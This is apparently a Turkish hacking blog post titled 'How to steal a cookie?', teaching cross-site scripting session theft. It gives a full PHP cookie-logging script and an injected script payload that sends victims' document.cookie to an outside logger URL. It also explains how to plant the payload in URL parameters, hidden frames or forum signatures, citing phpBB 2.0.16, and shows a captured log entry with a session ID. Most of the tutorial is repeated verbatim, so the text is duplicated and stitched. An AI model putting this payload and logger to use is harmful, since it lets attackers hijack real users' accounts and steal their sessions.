Cookie nasıl çalınır?
Açığın olduğu alan tespit edilir; Açığın olduğu alanı bulmak için örneğin forumlarda html/java yiyen bölgelere deneme yapılır çeşitli kodlarla.İmza altına atarak olabilir,çeşitli türlerde olabilir. En azından şunu deniyebilirsiniz: "<script>javascript*alert ZararliKod*document.cookie);</script>" Bu kod JavaScript dilinde alert uyarı demek ,cookie parametresi ile birleşince o anki cookieni ekrana yansıtır sadece seninkini tabi.Baktın oluyor daha tehlikelisin denersin. -Bir script ile Cookienin loglanması sağlanır;Aşağıda Cookieyi çalmak için gerekli scripti yazacağız. -Açığın olduğu yere bir script enjekte edilir;Cookie bilgisini gönderecek alert gibi -Kurbanın o Url’ye veya sayfaya bir şekilde girmesi sağlanır:Direk link veremieğinize göre(salaksa veririz) bir frame içinde olabilir çeşitli yollarla deniyebilirsiniz.Hele forum gibi alanlarda direk verirsiniz görünmez çünkü.
Evet Uygulamaya Geçelim;
CODE
<?php
$filename = getcwd()."\\\\loglarburada.txt";
if(!file_exists($filename)){
touch($filename);
chmod($filename, 0666);
}
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ’a’))
{
echo "Hata: Loglar dosyaya yazılamadı!";
exit;
}
else
{
if (fwrite($handle, "\\r\\n" . $_GET["cookie"]) === FALSE)
{
echo "Hata: Loglar dosyaya yazılamadı!";
exit;
}
}
echo "Log başarıyla girildi...";
fclose($handle);
exit;
}
echo "Hani loglayacağımız parametre?";
exit;
?>
Yukarıdaki bir Php scriptimizdir Cookieyi loglamaya yarıyacak.Peki ne diyor scripti loglarburada.txt diye yeni bir .txt belgesi oluştur ve buraya cookieyi yaz diyor. Cookienin yazılabilmesi için ChMod777 yani yazma izninde olması gerekiyor anlamına gelir
Cookieyi şu parametre ile alacağız; CODE <script>window.navigate("http://xx.com/cookie.php?cookie="+document.cookie)</script
Nasılmı dediğinizi duyuyorum,biraz örneklere geçelim. Şimdi mesela bir sitede denemeler yapıyoruz örneğin haber sayfası diyelim şu şekilde bir url war xx.com/haberdetay.asp?id=1 Ewt biz bunu ; xx.com/haberdetay.asp?id=<script>javascript*alert ZararliKod*documen t.cookie);</script> Şu şekilde bir kontrol ettiririz bakalım <; gibi taglar yasaklanmışmı diye ekranda cookie gösteriyorsa denememizi yapabiliriz. Yanlız timeouttanda script düşebilir,kesin çalışacak die birşey yok. E buldukta napıcağız biz bunu,bir frame içinde kurbanı çaktırmadan bu urlye sokacaksınız hangi urlye?Xss yedirdiğiniz yere yani; CODE xx.com/haberdetay.asp?id=<script>window.navigate("http://xx.com/cookie.php?cookie="+document.cookie)</script> Şeklinde Urlye sokucaksınız. Diğer bir örnek forum alanları.Buradada İmza bölümüne Gerekli cookieyi çalacak kodu girersiniz işliyorsa gözükmez,ve o sayfayı görüntüleyen kullanıcının cookileri size loglanır. Bunun en açık örneği Phpbb 2.0.16 Xss açığı aynı şekilde İmza ile hackliyoruz Bu Sekilde Mail Serverlerine biLe SızabıLırsınız.
IP: 85.233.105.50 COOKIE: JSESSIONID=64962EC2B6830699496C84AF5B65ACB1
GÖNDEREN: http://hedefsite.com/prot/m...TE&so=DESC&p=1
TARAYICI: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Evet Uygulamaya Geçelim;
CODE
<?php
$filename = getcwd()."\\\\loglarburada.txt";
if(!file_exists($filename)){
touch($filename);
chmod($filename, 0666);
}
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ’a’))
{
echo "Hata: Loglar dosyaya yazılamadı!";
exit;
}
else
{
if (fwrite($handle, "\\r\\n" . $_GET["cookie"]) === FALSE)
{
echo "Hata: Loglar dosyaya yazılamadı!";
exit;
}
}
echo "Log başarıyla girildi...";
fclose($handle);
exit;
}
echo "Hani loglayacağımız parametre?";
exit;
?>
Yukarıdaki bir Php scriptimizdir Cookieyi loglamaya yarıyacak.Peki ne diyor scripti loglarburada.txt diye yeni bir .txt belgesi oluştur ve buraya cookieyi yaz diyor. Cookienin yazılabilmesi için ChMod777 yani yazma izninde olması gerekiyor anlamına gelir
Cookieyi şu parametre ile alacağız; CODE <script>window.navigate("http://xx.com/cookie.php?cookie="+document.cookie)</script
Nasılmı dediğinizi duyuyorum,biraz örneklere geçelim. Şimdi mesela bir sitede denemeler yapıyoruz örneğin haber sayfası diyelim şu şekilde bir url war xx.com/haberdetay.asp?id=1 Ewt biz bunu ; xx.com/haberdetay.asp?id=<script>javascript*alert ZararliKod*documen t.cookie);</script> Şu şekilde bir kontrol ettiririz bakalım <; gibi taglar yasaklanmışmı diye ekranda cookie gösteriyorsa denememizi yapabiliriz. Yanlız timeouttanda script düşebilir,kesin çalışacak die birşey yok. E buldukta napıcağız biz bunu,bir frame içinde kurbanı çaktırmadan bu urlye sokacaksınız hangi urlye?Xss yedirdiğiniz yere yani; CODE xx.com/haberdetay.asp?id=<script>window.navigate("http://xx.com/cookie.php?cookie="+document.cookie)</script> Şeklinde Urlye sokucaksınız. Diğer bir örnek forum alanları.Buradada İmza bölümüne Gerekli cookieyi çalacak kodu girersiniz işliyorsa gözükmez,ve o sayfayı görüntüleyen kullanıcının cookileri size loglanır. Bunun en açık örneği Phpbb 2.0.16 Xss açığı aynı şekilde İmza ile hackliyoruz Bu Sekilde Mail Serverlerine biLe SızabıLırsınız.
IP: 85.233.105.50 COOKIE: JSESSIONID=64962EC2B6830699496C84AF5B65ACB1
GÖNDEREN: http://hedefsite.com/prot/m...TE&so=DESC&p=1
TARAYICI: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Yorumlar
Yorum Gönder